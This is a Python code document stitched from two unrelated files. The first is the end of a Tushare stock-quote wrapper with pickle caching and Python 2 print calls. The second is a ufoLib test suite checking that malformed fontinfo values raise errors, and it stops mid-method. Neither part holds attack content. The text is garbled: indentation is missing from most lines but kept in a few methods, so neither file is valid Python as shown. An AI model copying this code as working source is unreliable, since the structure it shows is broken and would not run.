        self.market_info = None
        market_info_file = data_path + ("/.market_info")
        # List of stock codes.
        self.code_list = []
        code_list_file = data_path + ("/.code_list")
        # List of stock names.
        self.name_list = []
        name_list_file = data_path + ("/.name_list")
        try:
            # The cache is written in binary mode below, so read it back
            # in binary mode too (the original opened in text mode).
            with open(market_info_file, 'rb') as mif, open(code_list_file, 'rb') as clf, open(name_list_file, 'rb') as nlf:
                self.market_info = pickle.load(mif)
                self.code_list = pickle.load(clf)
                self.name_list = pickle.load(nlf)
        except Exception:
            # Cache miss or unreadable cache: fetch fresh data and
            # rebuild the cache files.  (The previous bare ``except:``
            # also swallowed KeyboardInterrupt/SystemExit.)
            self.market_info = ts.get_today_all()
            self.code_list = self.market_info[['code', 'name']]['code'].tolist()
            self.name_list = self.market_info[['code', 'name']]['name'].tolist()
            with open(market_info_file, 'wb') as mif, open(code_list_file, 'wb') as clf, open(name_list_file, 'wb') as nlf:
                pickle.dump(self.market_info, mif)
                pickle.dump(self.code_list, clf)
                pickle.dump(self.name_list, nlf)

    def varifi_code(self, code):
        """Return True if the stock code exists, False otherwise.

        (Method name kept as ``varifi_code`` -- sic -- for backward
        compatibility with existing callers.)

        :param code: stock code to look up
        :returns: True when the code exists, else False
        :rtype: bool
        """
        return code in self.code_list

    def varifi_name(self, name):
        """Return True if the stock name exists, False otherwise.

        (Method name kept as ``varifi_name`` -- sic -- for backward
        compatibility with existing callers.)

        :param name: stock name to look up
        :returns: True when the name exists, else False
        :rtype: bool
        """
        return name in self.name_list

    def get_stock_info(self, query):
        """Get real-time information for the queried stock(s).

        :param query: 6-digit stock code, or an index code
            (sh=SSE Composite, sz=SZSE Component, hs300=CSI 300,
            sz50=SSE 50, zxb=SME board, cyb=ChiNext); accepts str, list,
            set or a pandas Series
        :returns: dict of stock information
        :rtype: dict
        """
        info = ts.get_realtime_quotes(query)
        return info.to_dict()

    def get_stock_price(self, query):
        """Return the real-time 'price' field for the queried stock(s).

        :param query: same accepted forms as get_stock_info
        :rtype: dict
        """
        stock_info = self.get_stock_info(query)
        return stock_info['price']
if __name__ == "__main__":
tsAPI = TushareAPI()
print tsAPI.varifi_code("000333")
print tsAPI.get_stock_info('000333')
print tsAPI.get_stock_info(['000333','002038'])
print tsAPI.get_stock_price('000333')
print tsAPI.get_stock_price(['000333','002038'])
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import shutil
import unittest
import tempfile
from io import open
from ufoLib import UFOReader, UFOWriter, UFOLibError
from ufoLib.glifLib import GlifLibError
from ufoLib.plistlib import readPlist, writePlist
from ufoLib.test.testSupport import fontInfoVersion3
class TestInfoObject(object): pass
# --------------
# fontinfo.plist
# --------------
class ReadFontInfoVersion3TestCase(unittest.TestCase):
def setUp(self):
self.dstDir = tempfile.mktemp()
os.mkdir(self.dstDir)
metaInfo = {
"creator": "test",
"formatVersion": 3
}
path = os.path.join(self.dstDir, "metainfo.plist")
with open(path, "wb") as f:
writePlist(metaInfo, f)
    def tearDown(self):
        # Remove the temporary UFO directory created in setUp().
        shutil.rmtree(self.dstDir)
    def _writeInfoToPlist(self, info):
        # Serialize ``info`` as the fontinfo.plist of the temporary UFO.
        path = os.path.join(self.dstDir, "fontinfo.plist")
        with open(path, "wb") as f:
            writePlist(info, f)
def testRead(self):
originalData = dict(fontInfoVersion3)
self._writeInfoToPlist(originalData)
infoObject = TestInfoObject()
reader = UFOReader(self.dstDir)
reader.readInfo(infoObject)
readData = {}
for attr in list(fontInfoVersion3.keys()):
readData[attr] = getattr(infoObject, attr)
self.assertEqual(originalData, readData)
def testGenericRead(self):
# familyName
info = dict(fontInfoVersion3)
info["familyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# styleName
info = dict(fontInfoVersion3)
info["styleName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# styleMapFamilyName
info = dict(fontInfoVersion3)
info["styleMapFamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# styleMapStyleName
## not a string
info = dict(fontInfoVersion3)
info["styleMapStyleName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["styleMapStyleName"] = "REGULAR"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# versionMajor
info = dict(fontInfoVersion3)
info["versionMajor"] = "1"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# versionMinor
info = dict(fontInfoVersion3)
info["versionMinor"] = "0"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["versionMinor"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# copyright
info = dict(fontInfoVersion3)
info["copyright"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# trademark
info = dict(fontInfoVersion3)
info["trademark"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# unitsPerEm
info = dict(fontInfoVersion3)
info["unitsPerEm"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["unitsPerEm"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["unitsPerEm"] = -1.0
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# descender
info = dict(fontInfoVersion3)
info["descender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# xHeight
info = dict(fontInfoVersion3)
info["xHeight"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# capHeight
info = dict(fontInfoVersion3)
info["capHeight"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# ascender
info = dict(fontInfoVersion3)
info["ascender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# italicAngle
info = dict(fontInfoVersion3)
info["italicAngle"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testGaspRead(self):
# not a list
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# empty list
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = []
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
# not a dict
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = ["abc"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# dict not properly formatted
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=0xFFFF, notTheRightKey=1)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(notTheRightKey=1, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# not an int for ppem
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM="abc", rangeGaspBehavior=[0]), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# not a list for behavior
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=10, rangeGaspBehavior="abc"), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# invalid behavior value
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=10, rangeGaspBehavior=[-1]), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# not sorted
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0]), dict(rangeMaxPPEM=10, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# no 0xFFFF
info = dict(fontInfoVersion3)
info["openTypeGaspRangeRecords"] = [dict(rangeMaxPPEM=10, rangeGaspBehavior=[0]), dict(rangeMaxPPEM=20, rangeGaspBehavior=[0])]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
def testHeadRead(self):
# openTypeHeadCreated
## not a string
info = dict(fontInfoVersion3)
info["openTypeHeadCreated"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## invalid format
info = dict(fontInfoVersion3)
info["openTypeHeadCreated"] = "2000-Jan-01 00:00:00"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHeadLowestRecPPEM
info = dict(fontInfoVersion3)
info["openTypeHeadLowestRecPPEM"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeHeadLowestRecPPEM"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHeadFlags
info = dict(fontInfoVersion3)
info["openTypeHeadFlags"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testHheaRead(self):
# openTypeHheaAscender
info = dict(fontInfoVersion3)
info["openTypeHheaAscender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaDescender
info = dict(fontInfoVersion3)
info["openTypeHheaDescender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaLineGap
info = dict(fontInfoVersion3)
info["openTypeHheaLineGap"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaCaretSlopeRise
info = dict(fontInfoVersion3)
info["openTypeHheaCaretSlopeRise"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaCaretSlopeRun
info = dict(fontInfoVersion3)
info["openTypeHheaCaretSlopeRun"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeHheaCaretOffset
info = dict(fontInfoVersion3)
info["openTypeHheaCaretOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testNameRead(self):
# openTypeNameDesigner
info = dict(fontInfoVersion3)
info["openTypeNameDesigner"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameDesignerURL
info = dict(fontInfoVersion3)
info["openTypeNameDesignerURL"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameManufacturer
info = dict(fontInfoVersion3)
info["openTypeNameManufacturer"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameManufacturerURL
info = dict(fontInfoVersion3)
info["openTypeNameManufacturerURL"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameLicense
info = dict(fontInfoVersion3)
info["openTypeNameLicense"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameLicenseURL
info = dict(fontInfoVersion3)
info["openTypeNameLicenseURL"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameVersion
info = dict(fontInfoVersion3)
info["openTypeNameVersion"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameUniqueID
info = dict(fontInfoVersion3)
info["openTypeNameUniqueID"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameDescription
info = dict(fontInfoVersion3)
info["openTypeNameDescription"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNamePreferredFamilyName
info = dict(fontInfoVersion3)
info["openTypeNamePreferredFamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNamePreferredSubfamilyName
info = dict(fontInfoVersion3)
info["openTypeNamePreferredSubfamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameCompatibleFullName
info = dict(fontInfoVersion3)
info["openTypeNameCompatibleFullName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameSampleText
info = dict(fontInfoVersion3)
info["openTypeNameSampleText"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameWWSFamilyName
info = dict(fontInfoVersion3)
info["openTypeNameWWSFamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameWWSSubfamilyName
info = dict(fontInfoVersion3)
info["openTypeNameWWSSubfamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeNameRecords
## not a list
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## not a dict
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = ["abc"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## invalid dict structure
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [dict(foo="bar")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## incorrect keys
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record.", foo="bar")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1)
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## invalid values
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID="1", platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID="1", encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID="1", languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID="1", string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string=1)
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## duplicate
info = dict(fontInfoVersion3)
info["openTypeNameRecords"] = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record."),
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
def testOS2Read(self):
# openTypeOS2WidthClass
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2WidthClass"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out or range
info = dict(fontInfoVersion3)
info["openTypeOS2WidthClass"] = 15
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2WeightClass
info = dict(fontInfoVersion3)
## not an int
info["openTypeOS2WeightClass"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info["openTypeOS2WeightClass"] = -50
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2Selection
info = dict(fontInfoVersion3)
info["openTypeOS2Selection"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2VendorID
info = dict(fontInfoVersion3)
info["openTypeOS2VendorID"] = 1234
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2Panose
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2Panose"] = [0, 1, 2, 3, 4, 5, 6, 7, 8, str(9)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## negative
info = dict(fontInfoVersion3)
info["openTypeOS2Panose"] = [0, 1, 2, 3, 4, 5, 6, 7, 8, -9]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## too few values
info = dict(fontInfoVersion3)
info["openTypeOS2Panose"] = [0, 1, 2, 3]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["openTypeOS2Panose"] = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2FamilyClass
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2FamilyClass"] = [1, str(1)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## too few values
info = dict(fontInfoVersion3)
info["openTypeOS2FamilyClass"] = [1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["openTypeOS2FamilyClass"] = [1, 1, 1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["openTypeOS2FamilyClass"] = [1, 201]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2UnicodeRanges
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2UnicodeRanges"] = ["0"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["openTypeOS2UnicodeRanges"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2CodePageRanges
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2CodePageRanges"] = ["0"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["openTypeOS2CodePageRanges"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2TypoAscender
info = dict(fontInfoVersion3)
info["openTypeOS2TypoAscender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2TypoDescender
info = dict(fontInfoVersion3)
info["openTypeOS2TypoDescender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2TypoLineGap
info = dict(fontInfoVersion3)
info["openTypeOS2TypoLineGap"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2WinAscent
info = dict(fontInfoVersion3)
info["openTypeOS2WinAscent"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeOS2WinAscent"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2WinDescent
info = dict(fontInfoVersion3)
info["openTypeOS2WinDescent"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["openTypeOS2WinDescent"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2Type
## not an int
info = dict(fontInfoVersion3)
info["openTypeOS2Type"] = ["1"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["openTypeOS2Type"] = [-1]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SubscriptXSize
info = dict(fontInfoVersion3)
info["openTypeOS2SubscriptXSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SubscriptYSize
info = dict(fontInfoVersion3)
info["openTypeOS2SubscriptYSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SubscriptXOffset
info = dict(fontInfoVersion3)
info["openTypeOS2SubscriptXOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SubscriptYOffset
info = dict(fontInfoVersion3)
info["openTypeOS2SubscriptYOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SuperscriptXSize
info = dict(fontInfoVersion3)
info["openTypeOS2SuperscriptXSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SuperscriptYSize
info = dict(fontInfoVersion3)
info["openTypeOS2SuperscriptYSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SuperscriptXOffset
info = dict(fontInfoVersion3)
info["openTypeOS2SuperscriptXOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2SuperscriptYOffset
info = dict(fontInfoVersion3)
info["openTypeOS2SuperscriptYOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2StrikeoutSize
info = dict(fontInfoVersion3)
info["openTypeOS2StrikeoutSize"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeOS2StrikeoutPosition
info = dict(fontInfoVersion3)
info["openTypeOS2StrikeoutPosition"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testVheaRead(self):
# openTypeVheaVertTypoAscender
info = dict(fontInfoVersion3)
info["openTypeVheaVertTypoAscender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaVertTypoDescender
info = dict(fontInfoVersion3)
info["openTypeVheaVertTypoDescender"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaVertTypoLineGap
info = dict(fontInfoVersion3)
info["openTypeVheaVertTypoLineGap"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
